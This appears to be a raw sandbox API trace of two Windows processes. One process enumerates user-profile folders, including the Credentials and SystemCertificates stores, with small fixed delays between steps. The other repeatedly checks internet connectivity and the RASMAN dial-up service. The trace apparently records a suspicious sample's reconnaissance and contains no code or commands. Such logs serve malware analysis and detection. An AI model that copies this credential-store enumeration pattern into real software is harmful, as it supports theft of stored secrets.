FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01\xa0\xcbZ\xd8\xd4I\xcd\x01\xa0\xcbZ\xd8\xd4I\xcd\x01\xa0\xcbZ\xd8\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x80\x98=\xab\xd4I\xcd\x01\x10P%\xd8\xd4I\xcd\x01\x10P%\xd8\xd4I\xcd\x01\x10P%\xd8\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00C\x00C\x00E\x00S\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00c\x00e\x00s\x00s\x00o\x00r\x00i\x00e\x00s\x00p\x00l\x00x\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01\xa0\xcbZ\xd8\xd4I\xcd\x01\xa0\xcbZ\xd8\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:55,438 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,518 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Start Menu\Programs\Accessories\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:55,518 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x98=\xab\xd4I\xcd\x01\x10P%\xd8\xd4I\xcd\x01\x10P%\xd8\xd4I\xcd\x01\x10P%\xd8\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00\x10P%\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00C\x00C\x00E\x00S\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00c\x00e\x00s\x00s\x00i\x00b\x00i\x00l\x00i\x00t\x00y\x00\x88\x00\x00\x00\x00\x00\x00\x00\xd0\xf9\x12\xd8\xd4I\xcd\x01\x00\x81\x14\xd8\xd4I\xcd\x01\x00\x81\x14\xd8\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:55,518 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,608 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Start Menu\Programs\Accessories\Accessibility\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:55,608 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10P%\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICx\x00\x00\x00\x00\x00\x00\x00\x10P%\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01\\x01\x00\x00\x00\x00\x00\x00`\x01\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00b\x00a\x00x\x00\x00\x00\x00\x00\x00\x00p^(\xd8\xd4I\xcd\x01\xa0\xe5)\xd8\xd4I\xcd\x01\xa0\xe5)\xd8\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:55,618 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,618 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,698 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Start Menu\Programs\Accessories\Entertainment\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:55,698 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`jl\xd7\xd4I\xcd\x01\x80-9\xd8\xd4I\xcd\x01\x80-9\xd8\xd4I\xcd\x01\x80-9\xd8\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICx\x00\x00\x00\x00\x00\x00\x00\x80-9\xd8\xd4I\xcd\x01\x80-9\xd8\xd4I\xcd\x01\x80-9\xd8\xd4I\xcd\x01\x80-9\xd8\xd4I\xcd\x01T\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00b\x00a\x00\x00\x00\x00\x00\x00\x00\x00\x000\xc9\x9b\xd7\xd4I\xcd\x01`P\x9d\xd7\xd4I\xcd\x01`P\x9d\xd7\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:55,698 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,698 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,698 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,778 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Start Menu\Programs\Startup\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:55,778 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01\xf0\xbb\x1d\x96\xd4I\xcd\x01 %49oI\xcd\x01 %49oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01`\x020\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01`\x020\xd8\xd4I\xcd\x01T\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:55,788 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,788 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,788 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,788 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,798 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:55,798 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:55,798 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:55,798 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:55,798 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:55,889 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Templates\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:55,889 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01`d\xb7\x84\xd4I\xcd\x01`d\xb7\x84\xd4I\xcd\x01`d\xb7\x84\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xa0\xd4\x98\x84\xd4I\xcd\x01\xa0\xd4\x98\x84\xd4I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01\xa0\xd4\x98\x84\xd4I\xcd\x01\xda\x11\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00m\x00i\x00p\x00r\x00o\x00.\x00s\x00a\x00m\x00i\x00(\x00z\x00p\x00\x00\x00\x00\x00\x00\x00\xd0[\x9a\x84\xd4I\xcd\x01\xd0[\x9a\x84\xd4I\xcd\x01\x00\xa0\xa1\x10'\x9e\xc8\x01 |
SUCCESS | 0x00000000 | |
| 07:43:55,889 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,899 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,899 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00002000 BaseAddress => 0x0016a000 |
SUCCESS | 0x00000000 | |
| 07:43:55,899 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,089 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:56,089 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x89\x87\x8e\xd5I\xcd\x01\xaf}^a\xaf\x91\xcf\x01\x00Y\x98\x8e\xd5I\xcd\x01\x00Y\x98\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x80\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01`\x89\x15(\xf2\x91\xcf\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00P\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01`\x89\x15(\xf2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:56,089 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,169 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:56,169 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01`\x89\x15(\xf2\x91\xcf\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\xb0\xa6\x8d\x8e\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x10\x00M\x00I\x00C\x00R\x00O\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:43:56,169 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,249 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:56,249 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\xb0\xa6\x8d\x8e\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.x\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00R\x00E\x00D\x00E\x00N\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00r\x00e\x00d\x00e\x00n\x00t\x00i\x00a\x00l\x00s\x00s\x00.\x00\x80\x00\x00\x00\x00\x00\x00\x00\xb0\xa6\x8d\x8e\xd5I\xcd\x01\xb0\xa6\x8d\x8e\xd5I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:56,249 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,329 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\Credentials\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:56,329 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xda\x00\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00-\x001\x00-\x005\x00-\x001\x009\x00 |
SUCCESS | 0x00000000 | |
| 07:43:56,329 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,409 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\*.* |
SUCCESS | 0x0016ce68 | |
| 07:43:56,409 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x000\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x010\xe0\x99\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:56,409 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,409 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,409 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,489 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\Internet Explorer\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:56,489 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xb0\xa6\x8d\x8e\xd5I\xcd\x01\xb0\xa6\x8d\x8e\xd5I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:56,489 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,489 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,570 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\Media Player\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:56,570 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xb0\xa6\x8d\x8e\xd5I\xcd\x01\xb0\xa6\x8d\x8e\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:56,570 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,570 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,600 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:56,600 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:56,600 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016f2b0 | |
| 07:43:56,600 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016f2b0 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016f300 | |
| 07:43:56,600 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:56,600 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:56,600 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:56,650 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:56,650 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xda\x00\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00y\x00 |
SUCCESS | 0x00000000 | |
| 07:43:56,650 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,730 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\*.* |
SUCCESS | 0x0016ce68 | |
| 07:43:56,730 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00E\x00R\x00T\x00I\x00F\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00e\x00r\x00t\x00i\x00f\x00i\x00c\x00a\x00t\x00e\x00s\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01`\xb0M2oI\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:56,730 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,810 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:56,810 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:56,810 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:56,810 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:56,890 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:56,890 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x80\x1f\x8c\x8e\xd5I\xcd\x01\x80\x1f\x8c\x8e\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xe0-\x8f\x8e\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:56,890 | 504 | NtQueryDirectoryFile |
